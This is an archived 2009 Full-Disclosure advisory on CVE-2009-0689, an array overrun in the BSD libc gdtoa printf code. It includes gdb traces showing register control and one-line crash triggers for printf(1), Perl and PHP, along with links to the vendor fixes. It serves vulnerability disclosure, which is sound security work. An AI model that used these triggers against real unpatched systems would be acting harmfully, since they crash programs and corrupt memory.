lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4A44D11F.6080308@securityreason.com>
Date: Fri, 26 Jun 2009 15:46:07 +0200
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: SecurityReason: Multiple Vendors libc/gdtoa
	printf(3) Array Overrun

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Multiple Vendors libc/gdtoa printf(3) Array Overrun ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 25.06.2009

CVE: CVE-2009-0689
Risk: High

Affected Software (12.06.2009):
- - OpenBSD 4.5
- - NetBSD 5.0
- - FreeBSD 7.2/6.4

Original URL:
http://securityreason.com/achievement_securityalert/63


- --- 0.Description ---
Week after the release of new version OpenBSD and NetBSD, our research
team has checked a new implementation of gdtoa

http://openbsd.org/45.html

- ---
A new version of the gdtoa code has been integrated, bringing better C99
support to printf(3) and friends.
- ---

More:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/

- --- 1. Multiple Vendors libc/gdtoa printf(3) Array Overrun ---
The main problem exists in new dtoa implementation.

asprintf(3) will crash for asprintf(ssij, "%0.262159f",x)

where x != 0

the behavior is correct for 262158

Let's see:

(gdb) r
Starting program: /cxib/C/check
Program received signal SIGSEGV, Segmentation fault.
0xbbbb79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
(gdb) bt
#0  0xbbbb79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
#1  0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12
#2  0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12
#3  0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12
#4  0xbbb882e1 in asprintf () from /usr/lib/libc.so.12
#5  0x08048706 in main () at check.c:6

Let's see src/lib/libc/gdtoa/gdtoaimp.h
- ---gdtoaimp.h---
...
#define Kmax 15
...
- ---gdtoaimp.h---

The maximum Kmax length is 15. If we give bigger value, like 17 (edi),
program will overrun freelist array. bss will have 0x1.

Correct reason (by NetBSD):
- ---gdtoaimp.h---
...
#define Kmax (sizeof(size_t) << 3)
...
- ---gdtoaimp.h---

What is wrong? This program will crash in
- --- src/lib/libc/gdtoa/misc.c ---
	if ( (rv = freelist[k]) !=0) {
		freelist[k] = rv->next;
		}
	else {
		x = 1 << k;
#ifdef Omit_Private_Memory
		rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));
#else
		len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1)
			/sizeof(double);
		if ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem) {
			rv = (Bigint*)(void *)pmem_next;
			pmem_next += len;
			}
		else
			rv = (Bigint*)MALLOC(len*sizeof(double));
#endif
		if (rv == NULL)
			return NULL;
		rv->k = k;
		rv->maxwds = x;
		}
- --- src/lib/libc/gdtoa/misc.c ---

here

rv->k = k;

or

freelist[k] = rv->next;

A good example to show this issue is printf(1) program.

127# printf %1.262159f 1.1
Memory fault (core dumped)

127# printf %11.2109999999f
210919999199919999199991791199.5000000000000000000000000000000001000000000001001

esi = 0x12
edi = 0x1d

127# printf %11.2009999999f
220919999199919999199991791199.5000000000000000000000000000000001000000000001001

esi = 0x13
edi = 0x1d

we can manipulate esi reg.

127# printf %11.2009999999f
126768668100000000000000000000.100000000000000000000000000000000000000000000000111111111

Program received signal SIGSEGV, Segmentation fault.
__Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59
59                      freelist[k] = rv->next;
(gdb) i r
eax            0x20efdb04       552590084
ecx            0x77ce2a9d       2010000029
edx            0x0      0
ebx            0x20eff654       552597076
esp            0xcfbfc2b0       0xcfbfc2b0
ebp            0xcfbfc2c8       0xcfbfc2c8
esi            0x41414141       1094795585
edi            0x1d     29
eip            0xf59317 0xf59317
eflags         0x10206  66054
cs             0x2b     43
ss             0x33     51
ds             0x33     51
es             0x33     51
fs             0x33     51
gs             0x33     51

esi = 0x41414141
edi = 0x1d

1267686681 is value of esi reg.

program will crash in

freelist[k] = rv->next;

Example 0:
- --- chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
- --- chujwamwmuzg.pl ---

Perl will crash with
esi = 0x41414141
edi = 0x15

Example 1:
127# php -r 'money_format("%0.262159n", 1.1111);'
Memory fault (core dumped)

Programs that allow you to enter/control format string, are vulnerable.
We believe that the OpenBSD source-tree have only printf(1) and perl(1)
affected.

Functions like printf(3), strfmon(3), fprintf(3), sprintf(3),
snprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3),
vsnprintf(3), vasprintf(3) and others, are vulnerable (with new gdtoa impl.)
Other languages are also affected ( printf in perl )

- --- 2. Fix ---
NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c

- --- 3. Greets ---
Christos Zoulas

sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d0t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.pl/


-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkpE0R4ACgkQpiCeOKaYa9YYvwCg0fYitWkK3qzaVOmc2QfcJlxi
8mcAoJbBMawOs1N7dBWT5Ge4yvuhA8ZG
=ocve
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ